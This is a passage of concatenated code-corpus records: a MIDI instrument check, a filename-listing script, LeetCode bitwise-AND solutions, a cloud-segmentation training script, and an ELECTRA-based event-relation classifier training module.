has_all_instruments(self, program_numbers):\n \"\"\"\n Checks if the program numbers contain all four desired instruments\n\n Parameters\n ----------\n program numbers : list of program numbers\n\n Returns\n -------\n True : if program numbers contains all four desired instruments\n False : otherwise\n \"\"\"\n piano_program_numbers = set([0, 1, 2, 3, 4])\n guitar_program_numbers = set([25, 26, 27, 28, 29])\n bass_program_numbers = set([33, 34, 35, 36, 37, 38, 52])\n string_program_numbers = set([41, 42, 43, 49, 50, 51])\n\n return not set(program_numbers).isdisjoint(piano_program_numbers) and \\\n not set(program_numbers).isdisjoint(guitar_program_numbers) and \\\n not 
set(program_numbers).isdisjoint(bass_program_numbers) and \\\n not set(program_numbers).isdisjoint(string_program_numbers) ","sub_path":"importMIDI.py","file_name":"importMIDI.py","file_ext":"py","file_size_in_byte":3145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"330987658","text":"# NOTE (to self) DEPRECATED! Use json-schema-to-java-common.py instead\nimport os\n\n\nPATH = r'C:\\dev\\projects\\idea\\isin-schema-message-generator\\src\\main\\java\\com\\etradingsoftware\\symbology\\generator\\template\\foreign_exchange'\n\n\nclass FilenamesToList(object):\n\n def __init__(self):\n pass\n\n @staticmethod\n def get_list():\n files = []\n\n for f in os.listdir(PATH):\n files.append(f)\n\n return files\n\n @staticmethod\n def to_java_class(files):\n java_classes = []\n\n for f in files:\n java_classes.append(f.replace('.java', ''))\n\n return java_classes\n\n\nif __name__ == '__main__':\n filenamesToList = FilenamesToList()\n files = filenamesToList.get_list()\n java_classes = filenamesToList.to_java_class(files)\n\n for java_class in java_classes:\n print(java_class)\n\n","sub_path":"Scripts/2017/ets/json-schema-to-java-util/filenames-to-list/filenames-to-list.py","file_name":"filenames-to-list.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"377716713","text":"\"\"\"\n201. Bitwise AND of Numbers Range\nMedium\n\nGiven a range [m, n] where 0 <= m <= n <= 2147483647, return the bitwise AND of all numbers in this range, inclusive.\n\nExample 1:\n\nInput: [5,7]\nOutput: 4\n\nExample 2:\n\nInput: [0,1]\nOutput: 0\n\"\"\"\n\n###############################################################################\n\"\"\"\nSolution: another way to find common leftmost part of m and n.\n\nhttps://leetcode.com/problems/bitwise-and-of-numbers-range/discuss/56721/2-line-Solution-with-detailed-explanation\n\n\"\"\"\nclass Solution:\n def rangeBitwiseAnd(self, m: int, n: int) -> int:\n while m < n:\n n &= n - 1 # unset R-most 1-bit in n\n\n return n\n\n###############################################################################\n\"\"\"\nSolution 2: find common leftmost part of m and n.\n\nIf m != n, then they have different parity and the final bits are different.\nSo shift both m and down to right to remove final bits.\nKeep going until m == n.\nThis happens when we reached the common left part of m and n.\nThen we shift back to the left by the same amount we shifted to the right.\n\nAnother way to look at it:\nTraversing from m to n, the bits keep changing, with the bits further to\nthe right changing more frequently. The bits that change cause the AND of\nthe range to have a 0 at the corresponding positions. A bit doesn't change\nunless all the bits to its right have changed. 
So the only 1-bits in the\nAND of the range are the leftmost bits that m and n share.\n\nO(log max(m,n)) time: worst case is when both m and n need to be shifted to 0.\nO(1) extra space\n\n\"\"\"\nclass Solution2:\n def rangeBitwiseAnd(self, m: int, n: int) -> int:\n k = 0\n\n while m != n:\n k += 1\n m >>= 1\n n >>= 1\n\n return m << k\n\n\"\"\"\nSolution 2b: recursive version.\n\"\"\"\nclass Solution2b:\n def rangeBitwiseAnd(self, m: int, n: int) -> int:\n if n > m: # n != m\n return self.rangeBitwiseAnd(m >> 1, n >> 1) << 1\n \n return m\n\n###############################################################################\n\"\"\"\nSolution 3:\n\nAny range that includes 0 has answer 0.\nAny range that includes both 1 and 2 has answer 0.\n\nExample: contains two different powers of 2, so answer is 0.\n\n2 = 0b0010\n3 = 0b0011\n4 = 0b0100\n\nLargest range that contains only one power of 2 is like [9, 31].\nThe only power of 2 in [2^k + 1, 2^(k+2) - 1] is 2^(k+1).\nSmallest example is [1, 2].\n\nExample of range that contains only one power of 2: [9, 31]\n9 = 0b00_1001\n10 = 0b00_1010\n16 = 0b01_0000\n31 = 0b01_1111\nAnswer is 0.\n\n15 & 16 = 0b0_1111 & 0b1_0000 = 0\n\n*** If a range includes a power of 2 and the number just before it,\nthen the answer is 0.\nSuppose p is a power of 2 in the range and its only 1-bit is the kth bit.\nThen p-1 has kth bit 0. So p & (p-1) = 0. So the bitwise AND or the range is 0.\n\nWe can tell a range is like this if NOT all the numbers in it share the same\nL-most 1-bit. In particular, we can check the first and last number.\n\nAssume if a range includes a power of 2, then it is the only power of 2 in the\nrange, and that the range begins with that power of 2.\nThat is, assume all numbers in the range share the same L-most 1-bit.\n\nThis 1-bit corresponds to the largest power of 2 that is <= m.\nWe can then subtract m from each number in the range, and recursively\ncalculate for the new range.\n\nExample: range [5, 7]\n5 = 0b101\n6 = 0b110\n7 = 0b111\n\nThey all share the same L-most 1-bit, which corresponds to 4.\nBiggest power of 2 that is < m = 5 is 4.\n\nSubtract 4 from all to get new range [1, 3]:\n1 = 0b001\n2 = 0b010\n3 = 0b011\n\nThey do not share the same L-most 1-bit, so the bitwise AND for this range is 0.\n\nCombining answers give 4 + 0 = 4.\n\n\"\"\"\nclass Solution3:\n def rangeBitwiseAnd(self, m: int, n: int) -> int:\n def left_bit(n): # return position of leftmost 1-bit (-1 for n=0)\n count = -1\n while n:\n n >>= 1\n count += 1\n\n return count\n\n if m == 0:\n return 0\n # if m == 1:\n # return int(n == 1)\n\n k = left_bit(m)\n if k != left_bit(n):\n return 0\n\n res = 1 << k\n\n return res | self.rangeBitwiseAnd(m - res, n - res)\n\n###############################################################################\n\"\"\"\nSolution 4: brute force\n\nTLE\n\"\"\"\nclass Solution4:\n def rangeBitwiseAnd(self, m: int, n: int) -> int:\n s = m\n \n for i in range(m+1, n+1):\n s &= i\n if s == 0:\n return 0\n \n return s\n\n###############################################################################\n\nif __name__ == \"__main__\":\n def test(m, n, comment=None): \n print(\"=\"*80)\n if comment:\n print(comment)\n\n print(f\"\\nm = {m}\")\n print(f\"n = {n}\")\n \n res = sol.rangeBitwiseAnd(m, n)\n\n print(f\"\\nresult = {res}\\n\")\n\n sol = Solution() # find common L-most part by unsetting R-most 1-bit of n until n < m\n \n #sol = Solution2() # find common L-most part by checking m != n and doing >> 1\n #sol = Solution2b() # recursive version\n \n 
#sol = Solution3() # use fact that if p is power of 2, then p & (p-1) = 0.\n\n #sol = Solution4() # brute force; TLE\n\n comment = 'LC ex1; answer = 4'\n m = 5\n n = 7\n test(m, n, comment)\n\n comment = 'LC ex2; answer = 0'\n m = 0\n n = 1\n test(m, n, comment)\n\n comment = 'LC TC; answer = 2'\n m = 2\n n = 2\n test(m, n, comment)\n\n comment = 'LC TC; answer = 0'\n m = 2\n n = 4\n test(m, n, comment)\n\n comment = '; answer = 32'\n m = 33\n n = 63\n test(m, n, comment)\n\n comment = \"LC TC; answer = 0\"\n m = 600000000\n n = 2147483645\n test(m, n, comment)\n","sub_path":"bits/0201_bitwise_and_of_numbers_range.py","file_name":"0201_bitwise_and_of_numbers_range.py","file_ext":"py","file_size_in_byte":5780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"463931926","text":"import argparse\nimport os\nimport multiprocessing\n\nfrom dataset import get_dataset, prepare_dataset, get_train_test, CloudDataset, get_preprocessing\nfrom augmentations import training1, valid1\nfrom aspp import aspp, resize_like, NewBCELoss\nfrom radam import RAdam\nfrom torch.optim import AdamW, Adam\nfrom schedulers import NoamLR\n\nimport segmentation_models_pytorch as smp\nfrom torch.utils.data import DataLoader\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\nfrom torch.optim import SGD\nimport torch\n\nimport catalyst\nfrom catalyst.dl import utils\nfrom catalyst.dl.runner import SupervisedRunner\nfrom catalyst.dl.callbacks import DiceCallback, EarlyStoppingCallback, CriterionCallback, OptimizerCallback\n\nfrom dice import NewDiceCallback\n\ndef main():\n parser=argparse.ArgumentParser()\n parser.add_argument('--encoder', type=str, default='efficientnet-b0')\n parser.add_argument('--model', type=str, default='unet')\n parser.add_argument('--pretrained', type=str, default='imagenet')\n parser.add_argument('--logdir', type=str, default='../logs/')\n parser.add_argument('--exp_name', type=str)\n parser.add_argument('--data_folder', type=str, default='../input/')\n parser.add_argument('--height', type=int, default=320)\n parser.add_argument('--width', type=int, default=640)\n parser.add_argument('--batch_size', type=int, default=2)\n parser.add_argument('--accumulate', type=int, default=8)\n parser.add_argument('--epochs', type=int, default=20)\n parser.add_argument('--enc_lr', type=float, default=1e-2)\n parser.add_argument('--dec_lr', type=float, default=1e-3)\n parser.add_argument('--optim', type=str, default=\"radam\")\n parser.add_argument('--loss', type=str, default=\"bcedice\")\n parser.add_argument('--schedule', type=str, default=\"rlop\")\n parser.add_argument('--early_stopping', type=bool, default=True)\n \n\n args = parser.parse_args()\n\n encoder = args.encoder\n model = args.model\n pretrained = args.pretrained\n logdir = args.logdir\n name = args.exp_name\n data_folder = args.data_folder\n height = args.height\n width = args.width\n bs = args.batch_size\n accumulate = args.accumulate\n epochs = args.epochs\n enc_lr = args.enc_lr\n dec_lr = args.dec_lr\n optim = args.optim\n loss = args.loss\n schedule = args.schedule\n early_stopping = args.early_stopping\n\n if model == 'unet':\n model = smp.Unet(\n encoder_name=encoder,\n encoder_weights=pretrained,\n classes=4,\n activation=None\n )\n if model == 'fpn':\n model = smp.FPN(\n encoder_name=encoder,\n encoder_weights=pretrained,\n classes=4,\n activation=None,\n )\n if model =='pspnet':\n model = smp.PSPNet(\n encoder_name=encoder,\n encoder_weights=pretrained,\n classes=4,\n 
activation=None,\n )\n if model == 'linknet':\n model = smp.Linknet(\n encoder_name=encoder,\n encoder_weights=pretrained,\n classes=4,\n activation=None,\n )\n if model == 'aspp':\n print('aspp can only be used with resnet34')\n model = aspp(num_class=4)\n\n preprocessing_fn = smp.encoders.get_preprocessing_fn(encoder, pretrained)\n log = os.path.join(logdir, name)\n\n ds = get_dataset(path=data_folder)\n prepared_ds = prepare_dataset(ds)\n\n train_set, valid_set = get_train_test(ds)\n\n train_ds = CloudDataset(df=prepared_ds, datatype='train', img_ids=train_set, transforms=training1(h=height, w=width), preprocessing=get_preprocessing(preprocessing_fn), folder=data_folder)\n valid_ds = CloudDataset(df=prepared_ds, datatype='train', img_ids=valid_set, transforms=valid1(h=height, w=width), preprocessing=get_preprocessing(preprocessing_fn), folder=data_folder)\n\n train_loader = DataLoader(train_ds, batch_size=bs, shuffle=True, num_workers=multiprocessing.cpu_count())\n valid_loader = DataLoader(valid_ds, batch_size=bs, shuffle=False, num_workers=multiprocessing.cpu_count())\n\n loaders = {\n 'train': train_loader,\n 'valid': valid_loader,\n }\n\n num_epochs = epochs\n \n if args.model != \"aspp\":\n if optim == \"radam\":\n optimizer = RAdam([\n {'params': model.encoder.parameters(), 'lr': enc_lr},\n {'params': model.decoder.parameters(), 'lr': dec_lr},\n ])\n if optim == \"adam\":\n optimizer = Adam([\n {'params': model.encoder.parameters(), 'lr': enc_lr},\n {'params': model.decoder.parameters(), 'lr': dec_lr},\n ])\n if optim == \"adamw\":\n optimizer = AdamW([\n {'params': model.encoder.parameters(), 'lr': enc_lr},\n {'params': model.decoder.parameters(), 'lr': dec_lr},\n ])\n if optim == \"sgd\":\n optimizer = SGD([\n {'params': model.encoder.parameters(), 'lr': enc_lr},\n {'params': model.decoder.parameters(), 'lr': dec_lr},\n ])\n elif args.model == 'aspp':\n if optim == \"radam\":\n optimizer = RAdam([\n {'params': model.parameters(), 'lr': enc_lr},\n ])\n if optim == \"adam\":\n optimizer = Adam([\n {'params': model.parameters(), 'lr': enc_lr},\n ])\n if optim == \"adamw\":\n optimizer = AdamW([\n {'params': model.parameters(), 'lr': enc_lr},\n ])\n if optim == \"sgd\":\n optimizer = SGD([\n {'params': model.parameters(), 'lr': enc_lr},\n ])\n\n scheduler = ReduceLROnPlateau(optimizer, factor=0.1, patience=5)\n if schedule == \"rlop\":\n scheduler = ReduceLROnPlateau(optimizer, factor=0.15, patience=3)\n if schedule == \"noam\":\n scheduler = NoamLR(optimizer, 10)\n\n if loss == \"bcedice\":\n criterion = smp.utils.losses.BCEDiceLoss(eps=1.)\n if loss == \"dice\":\n criterion = smp.utils.losses.DiceLoss(eps=1.)\n if loss == \"bcejaccard\":\n criterion = smp.utils.losses.BCEJaccardLoss(eps=1.)\n if loss == \"jaccard\":\n criterion = smp.utils.losses.JaccardLoss(eps=1.)\n if loss == 'bce':\n criterion = NewBCELoss()\n\n callbacks = [NewDiceCallback(), CriterionCallback()]\n\n callbacks.append(OptimizerCallback(accumulation_steps=accumulate))\n if early_stopping:\n callbacks.append(EarlyStoppingCallback(patience=5, min_delta=0.001))\n\n runner = SupervisedRunner()\n runner.train(\n model=model,\n criterion=criterion,\n optimizer=optimizer,\n scheduler=scheduler,\n loaders=loaders,\n callbacks=callbacks,\n logdir=log,\n num_epochs=num_epochs,\n verbose=True,\n )\n\n\nif __name__ == \"__main__\":\n 
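# A minimal invocation sketch (added; the flag values are illustrative\n # assumptions, not settings taken from the original experiments):\n # python train.py --model unet --encoder efficientnet-b0 --exp_name baseline --data_folder ../input/ --batch_size 2 --epochs 20\n 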
main()","sub_path":"working/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"53194068","text":"# 事件关系分类模块\r\n# 作者:宋杨\r\nfrom nl2tensor import *\r\nfrom process_control import *\r\nimport os\r\nimport re\r\nfrom utils.argutils import print_args\r\n# from pathlib import Path\r\nimport argparse\r\nimport json\r\nfrom torch.autograd import Variable\r\nimport torch.optim\r\nimport numpy as np\r\nfrom tqdm import trange\r\nfrom language_model.transformers.configuration_electra import ElectraConfig\r\nfrom my_optimizers import Ranger\r\nfrom sklearn.model_selection import train_test_split\r\nfrom torch.utils.data import DataLoader, TensorDataset, RandomSampler\r\nfrom language_model.transformers import ElectraTokenizer\r\nfrom nn.my_embeddings import MyElectraModel\r\nfrom models.cnn_model import *\r\nimport datetime\r\n\r\n\r\n# 设置全局变量\r\ndef set_args(filename):\r\n parser = argparse.ArgumentParser()\r\n # 可调参数\r\n parser.add_argument(\"--train_epochs\",\r\n default=20, # 默认5\r\n type=int,\r\n help=\"训练次数大小\")\r\n parser.add_argument(\"--role_lr\",\r\n default=5e-2,\r\n type=float,\r\n help=\"Role_Embeddings初始学习步长\")\r\n parser.add_argument(\"--embeddings_lr\",\r\n default=5e-4,\r\n type=float,\r\n help=\"Embeddings初始学习步长\")\r\n parser.add_argument(\"--encoder_lr\",\r\n default=5e-3,\r\n type=float)\r\n parser.add_argument(\"--learning_rate\",\r\n default=5e-3,\r\n type=float)\r\n parser.add_argument(\"--weight_decay\", default=0, type=float)\r\n parser.add_argument(\"--train_batch_size\",\r\n default=16, # 默认8\r\n type=int,\r\n help=\"训练时batch大小\")\r\n parser.add_argument(\"--max_sent_len\",\r\n default=128, # 默认256\r\n type=int,\r\n help=\"文本最大长度\")\r\n parser.add_argument(\"--test_size\",\r\n default=.0,\r\n type=float,\r\n help=\"验证集大小\")\r\n parser.add_argument(\"--train_data_dir\",\r\n default='data/RnR_data/train/',\r\n type=str,\r\n help=\"The input data dir.\")\r\n parser.add_argument(\"--test_data_dir\",\r\n default='data/RnR_data/test/',\r\n type=str)\r\n parser.add_argument(\"--mymodel_config_dir\",\r\n default='config/relation_classify_config.json',\r\n type=str)\r\n parser.add_argument(\"--mymodel_save_dir\",\r\n default='checkpoint/relation_classify/',\r\n type=str)\r\n parser.add_argument(\"--pretrained_model_dir\",\r\n default='pretrained_model/pytorch_electra_180g_large/',\r\n type=str)\r\n parser.add_argument(\"--vocab_dir\",\r\n default='pretrained_model/pytorch_electra_180g_large/vocab.txt',\r\n type=str,\r\n help=\"The vocab data dir.\")\r\n parser.add_argument(\"--rel2label\",\r\n default={'Causal': 0, 'Follow': 1, 'Accompany': 2, 'Concurrency': 3, 'Other': 4},\r\n type=list)\r\n parser.add_argument(\"--max_role_size\",\r\n default=13,\r\n type=int)\r\n parser.add_argument(\"--do_train\",\r\n default=True,\r\n action='store_true',\r\n help=\"训练模式\")\r\n parser.add_argument(\"--do_eval\",\r\n default=True,\r\n action='store_true',\r\n help=\"验证模式\")\r\n parser.add_argument(\"--no_gpu\",\r\n default=False,\r\n action='store_true',\r\n help=\"用不用gpu\")\r\n parser.add_argument(\"--seed\",\r\n default=6,\r\n type=int,\r\n help=\"初始化时的随机数种子\")\r\n parser.add_argument(\"--gradient_accumulation_steps\",\r\n default=1,\r\n type=int,\r\n help=\"Number of updates steps to accumulate before performing a backward/update pass.\")\r\n parser.add_argument(\"--optimize_on_cpu\",\r\n default=False,\r\n action='store_true',\r\n help=\"Whether to perform 
optimization and keep the optimizer averages on CPU.\")\r\n    parser.add_argument(\"--fp16\",\r\n                        default=False,\r\n                        action='store_true',\r\n                        help=\"Whether to use 16-bit float precision instead of 32-bit.\")\r\n    parser.add_argument(\"--loss_scale\",\r\n                        default=128,\r\n                        type=float,\r\n                        help=\"Loss scaling, positive power of 2 values can improve fp16 convergence.\")\r\n    parser.add_argument(\"--local_rank\",\r\n                        type=int,\r\n                        default=-1,\r\n                        help=\"local_rank for distributed training on gpus\")\r\n    parser.add_argument(\"--no_cuda\",\r\n                        default=False,\r\n                        action='store_true')\r\n    args = parser.parse_args()\r\n    print_args(args, parser)\r\n    with open(filename, 'w') as f:\r\n        json.dump(args.__dict__, f, indent=2)\r\n    return args\r\n\r\n\r\n# Set up the global environment\r\ntry:\r\n    args = set_args('config/relation_classify_args.txt')\r\nexcept FileNotFoundError:\r\n    args = set_args('config/relation_classify_args.txt')\r\nlogger = get_logger()\r\nset_environ()\r\ntoday = datetime.datetime.now()\r\nmy_time = str(today.year)+'-'+str(today.month)+'-'+str(today.day)\r\nif args.local_rank == -1 or args.no_cuda:\r\n    device = torch.device(\"cuda\" if torch.cuda.is_available() and not args.no_cuda else \"cpu\")\r\n    n_gpu = torch.cuda.device_count()\r\nelse:\r\n    torch.cuda.set_device(args.local_rank)\r\n    device = torch.device(\"cuda\", args.local_rank)\r\n    n_gpu = 1\r\n    torch.distributed.init_process_group(backend='nccl')\r\nloss_device = torch.device(\"cpu\")\r\nlogger.info(\"device: {} n_gpu: {}, distributed training: {}, 16-bits training: {}\".format(\r\n    device, n_gpu, bool(args.local_rank != -1), args.fp16))\r\nif args.gradient_accumulation_steps < 1:\r\n    raise ValueError(\"Invalid gradient_accumulation_steps parameter: {}, should be >= 1\".format(\r\n        args.gradient_accumulation_steps))\r\n\r\n\r\n# Define a function that computes accuracy\r\ndef accuracy(preds, labels, seq_len):\r\n    count, right = 0.1, 0.1\r\n    for pred, label in zip(preds, labels):\r\n        for i in range(seq_len):\r\n            if label[i] != len(args.tag_to_ix) - 1 and label[i] != len(args.tag_to_ix) - 2 \\\r\n                    and label[i] != len(args.tag_to_ix) - 3 and label[i] != len(args.tag_to_ix) - 4:\r\n                count += 1\r\n                _, p = pred[i].topk(1)\r\n                if int(label[i]) == p[0].item():\r\n                    right += 1\r\n    return right / count\r\n\r\n\r\n# Convert a relation name to its label index\r\ndef rel2label(t_label, args):\r\n    try:\r\n        return args.rel2label[t_label]\r\n    except KeyError:  # unknown relation types fall back to the 'Other' label\r\n        return len(args.rel2label)-1\r\n\r\ndef sync(device: torch.device):\r\n    # FIXME\r\n    return\r\n    # For correct profiling (cuda operations are async)\r\n    if device.type == \"cuda\":\r\n        torch.cuda.synchronize(device)\r\n\r\n# Network training\r\ndef mymodel_train(args, logger, train_dataloader, validation_dataloader):\r\n    config = ElectraConfig.from_pretrained(args.mymodel_config_dir)\r\n    embedding = MyElectraModel(config=config)\r\n    model = RelClassifyModel(config=config, args=args)\r\n    # try:\r\n    #     output_model_file = os.path.join(args.mymodel_save_dir, 'embedding/')\r\n    #     model_state_dict = torch.load(os.path.join(output_model_file, 'pytorch_model.bin'))\r\n    #     embedding.load_state_dict(model_state_dict)\r\n    # except OSError:\r\n    #     embedding.from_pretrained(os.path.join(args.pretrained_model_dir, 'pytorch_model.bin'), config=config)\r\n    #     print(\"PretrainedEmbeddingNotFound\")\r\n    # try:\r\n    #     model.load(os.path.join(args.mymodel_save_dir, \"mymodel.bin\"))\r\n    # except OSError:\r\n    #     print(\"PretrainedMyModelNotFound\")\r\n    embedding.from_pretrained(os.path.join(args.pretrained_model_dir, 'pytorch_model.bin'), config=config)\r\n    if args.fp16:\r\n        embedding.half()\r\n        model.half()\r\n    
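# Added note: the two Ranger optimizers built below give the role embeddings,\r\n    # the rest of the ELECTRA embedding, the encoder, and the remaining model\r\n    # parameters their own learning rates (role_lr / embeddings_lr / encoder_lr /\r\n    # learning_rate from the parsed args).\r\n    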
embedding.to(device)\r\n model.to(device)\r\n model.set_loss_device(loss_device)\r\n param_optimizer1 = list(embedding.named_parameters())\r\n param_optimizer2 = list(model.named_parameters())\r\n optimizer_grouped_parameters1 = [\r\n {'params': [p for n, p in param_optimizer1 if any(nd in n for nd in ['role_embeddings'])],\r\n 'weight_decay_rate': args.weight_decay,\r\n 'lr': args.role_lr},\r\n {'params': [p for n, p in param_optimizer1 if not any(nd in n for nd in ['role_embeddings'])],\r\n 'lr': args.embeddings_lr},\r\n ]\r\n optimizer_grouped_parameters2 = [\r\n {'params': [p for n, p in param_optimizer2 if any(nd in n for nd in ['encoder'])],\r\n 'lr': args.encoder_lr},\r\n {'params': [p for n, p in param_optimizer2 if not any(nd in n for nd in ['encoder'])],\r\n 'lr': args.learning_rate},\r\n ]\r\n optimizer1 = Ranger(optimizer_grouped_parameters1)\r\n optimizer2 = Ranger(optimizer_grouped_parameters2)\r\n epochs = args.train_epochs\r\n bio_records, train_loss_set, acc_records = [], [], []\r\n embedding.train()\r\n model.train()\r\n for _ in trange(epochs, desc='Epochs'):\r\n tr_loss = 0\r\n eval_loss, eval_accuracy = 0, 0\r\n nb_tr_steps = 0\r\n nb_eval_steps = 0\r\n tmp_loss = []\r\n for step, batch in enumerate(train_dataloader):\r\n batch = tuple(t.to(device) for t in batch)\r\n b_input_ids1, b_input_ids2, b_labels, input_role1, input_role2 = batch\r\n sync(device)\r\n b_input_ids1 = b_input_ids1.squeeze(1).long()\r\n b_input_ids2 = b_input_ids2.squeeze(1).long()\r\n text_embedding1 = embedding(input_ids=b_input_ids1, role_ids=input_role1)\r\n text_embedding2 = embedding(input_ids=b_input_ids2, role_ids=input_role2)\r\n sync(device)\r\n loss, tmp_eval_accuracy = model(text_embedding1, text_embedding2, b_labels)\r\n sync(loss_device)\r\n optimizer1.zero_grad()\r\n optimizer2.zero_grad()\r\n loss.backward()\r\n optimizer1.step()\r\n optimizer2.step()\r\n tr_loss += loss.item()\r\n nb_tr_steps += 1\r\n eval_accuracy += tmp_eval_accuracy\r\n nb_eval_steps += 1\r\n tmp_loss.append(loss.item())\r\n adjust_learning_rate(optimizer1, 0.9)\r\n adjust_learning_rate(optimizer2, 0.9)\r\n try:\r\n train_loss_set.append(tr_loss / nb_tr_steps)\r\n logger.info('mymodel训练损失:{:.2f},准确率为:{:.2f}%'\r\n .format(tr_loss / nb_tr_steps, 100 * eval_accuracy / nb_eval_steps))\r\n acc_records.append(eval_accuracy / nb_eval_steps)\r\n bio_records.append(np.mean(train_loss_set))\r\n except ZeroDivisionError:\r\n logger.info(\"错误!请降低batch大小\")\r\n embedding_to_save = embedding.module if hasattr(embedding, 'module') else embedding\r\n torch.save(embedding_to_save.state_dict(),\r\n os.path.join(os.path.join(args.mymodel_save_dir, 'embedding/'), my_time+'pytorch_model.bin'))\r\n model.save(os.path.join(args.mymodel_save_dir, my_time+\"mymodel.bin\"))\r\n return embedding, model\r\n\r\n\r\n# 网络测试\r\ndef mymodel_test(logger, test_dataloader, the_time=my_time):\r\n config = ElectraConfig.from_pretrained(args.mymodel_config_dir)\r\n embedding = MyElectraModel(config=config)\r\n model = RelClassifyModel(config=config, args=args)\r\n output_model_file = os.path.join(args.mymodel_save_dir, 'embedding/')\r\n model_state_dict = torch.load(os.path.join(output_model_file, the_time+'pytorch_model.bin'))\r\n embedding.load_state_dict(model_state_dict)\r\n model.load(os.path.join(args.mymodel_save_dir, the_time+\"mymodel.bin\"))\r\n if args.fp16:\r\n embedding.half()\r\n model.half()\r\n embedding.to(device)\r\n model.to(device)\r\n embedding.eval()\r\n model.eval()\r\n acc_records = []\r\n eval_loss, eval_accuracy = 0, 0\r\n 
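# Added note: eval_loss is initialized above but never updated in this test\r\n    # pass; only the per-batch accuracies are accumulated and averaged.\r\n    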
nb_eval_steps = 0\r\n for step, batch in enumerate(test_dataloader):\r\n batch = tuple(t.to(device) for t in batch)\r\n b_input_ids1, b_input_ids2, b_labels, input_role1, input_role2 = batch\r\n b_input_ids1 = b_input_ids1.squeeze(1).long()\r\n b_input_ids2 = b_input_ids2.squeeze(1).long()\r\n with torch.no_grad():\r\n text_embedding1 = embedding(input_ids=b_input_ids1, role_ids=input_role1)\r\n text_embedding2 = embedding(input_ids=b_input_ids2, role_ids=input_role2)\r\n tmp_eval_accuracy = model.test(text_embedding1, text_embedding2, b_labels, input_role1, input_role2)\r\n eval_accuracy += tmp_eval_accuracy\r\n nb_eval_steps += 1\r\n try:\r\n logger.info('准确率为:{:.2f}%'\r\n .format(100 * eval_accuracy / nb_eval_steps))\r\n acc_records.append(eval_accuracy / nb_eval_steps)\r\n except ZeroDivisionError:\r\n logger.info(\"错误!请降低batch大小\")\r\n return acc_records\r\n\r\n\r\ndef mymodel_cal(logger, test_dataloader, the_time=my_time):\r\n config = ElectraConfig.from_pretrained(args.mymodel_config_dir)\r\n embedding = MyElectraModel(config=config)\r\n model = RelClassifyModel(config=config, args=args)\r\n output_model_file = os.path.join(args.mymodel_save_dir, 'embedding/')\r\n model_state_dict = torch.load(os.path.join(output_model_file, the_time+'pytorch_model.bin'))\r\n embedding.load_state_dict(model_state_dict)\r\n output_model_file = os.path.join(args.mymodel_save_dir, the_time+\"mymodel.bin\")\r\n model_state_dict = torch.load(output_model_file)\r\n model.load_state_dict(model_state_dict)\r\n if args.fp16:\r\n embedding.half()\r\n model.half()\r\n embedding.to(device)\r\n model.to(device)\r\n embedding.eval()\r\n model.eval()\r\n target_size = len(args.rel2label)\r\n result = np.zeros([target_size, target_size])\r\n for step, batch in enumerate(test_dataloader):\r\n batch = tuple(t.to(device) for t in batch)\r\n b_input_ids1, b_input_ids2, b_labels, input_role1, input_role2 = batch\r\n b_input_ids1 = b_input_ids1.squeeze(1).long()\r\n b_input_ids2 = b_input_ids2.squeeze(1).long()\r\n with torch.no_grad():\r\n text_embedding1 = embedding(input_ids=b_input_ids1, role_ids=input_role1)\r\n text_embedding2 = embedding(input_ids=b_input_ids2, role_ids=input_role2)\r\n pred = model.get_guess(text_embedding1, text_embedding2, input_role1, input_role2)\r\n size = pred.size()[0]\r\n for i in range(size):\r\n try:\r\n result[b_labels[i], label_from_output(pred[i])] += 1\r\n except:\r\n continue\r\n print(result)\r\n return result\r\n\r\n\r\n# 获取数据集\r\ndef get_dataloader(filenames):\r\n tokenizer = ElectraTokenizer.from_pretrained(args.vocab_dir)\r\n input_ids1 = []\r\n input_ids2 = []\r\n input_role1 = []\r\n input_role2 = []\r\n labels = []\r\n try:\r\n E1 = np.load(filenames+\"e1.npy\")\r\n E2 = np.load(filenames+\"e2.npy\")\r\n B1 = np.load(filenames+\"b1.npy\")\r\n B2 = np.load(filenames+\"b2.npy\")\r\n R = np.load(filenames+\"r.npy\")\r\n except:\r\n from data.get_relation_from_xml import get_rel_and_role\r\n data, _ = get_rel_and_role('data/CEC', tokenizer)\r\n # _, data = get_rel_and_role('data/CEC', tokenizer)\r\n E1 = data[0]\r\n E2 = data[1]\r\n B1 = data[2]\r\n B2 = data[3]\r\n R = data[4]\r\n for i in range(len(E1)):\r\n tmp1, _, _ = text2ids(tokenizer, E1[i], args.max_sent_len)\r\n tmp2, _, _ = text2ids(tokenizer, E2[i], args.max_sent_len)\r\n input_role1.append(convert_single_list(B1[i], args.max_sent_len, args.max_role_size))\r\n input_role2.append(convert_single_list(B2[i], args.max_sent_len, args.max_role_size))\r\n label = rel2label(R[i], args)\r\n input_ids1.append(tmp1)\r\n 
input_ids2.append(tmp2)\r\n        labels.append(label)\r\n    train_input1, validation_input1, train_input2, validation_input2, \\\r\n    train_labels, validation_labels, input_role1, validation_input_role1,\\\r\n    input_role2, validation_input_role2 = \\\r\n        train_test_split(input_ids1, input_ids2, labels, input_role1, input_role2,\r\n                         random_state=args.seed, test_size=args.test_size)\r\n\r\n    # Convert the training set to tensors and build its dataloader\r\n    train_inputs1 = torch.Tensor(train_input1)\r\n    train_inputs2 = torch.Tensor(train_input2)\r\n    train_labels = torch.LongTensor(train_labels)\r\n    inputs_role1 = torch.LongTensor(input_role1)\r\n    inputs_role2 = torch.LongTensor(input_role2)\r\n    batch_size = args.train_batch_size\r\n    train_data = TensorDataset(train_inputs1, train_inputs2, train_labels, inputs_role1, inputs_role2)\r\n    train_sampler = RandomSampler(train_data)\r\n    train_dataloader = DataLoader(train_data,\r\n                                  sampler=train_sampler,\r\n                                  batch_size=batch_size)\r\n\r\n    if args.test_size > 0:\r\n        # Convert the validation set to tensors and build its dataloader\r\n        validation_inputs1 = torch.Tensor(validation_input1)\r\n        validation_inputs2 = torch.Tensor(validation_input2)\r\n        validation_labels = torch.LongTensor(validation_labels)\r\n        validation_role1 = torch.LongTensor(validation_input_role1)\r\n        validation_role2 = torch.LongTensor(validation_input_role2)\r\n        validation_data = TensorDataset(validation_inputs1, validation_inputs2, validation_labels,\r\n                                        validation_role1, validation_role2)\r\n        validation_sampler = 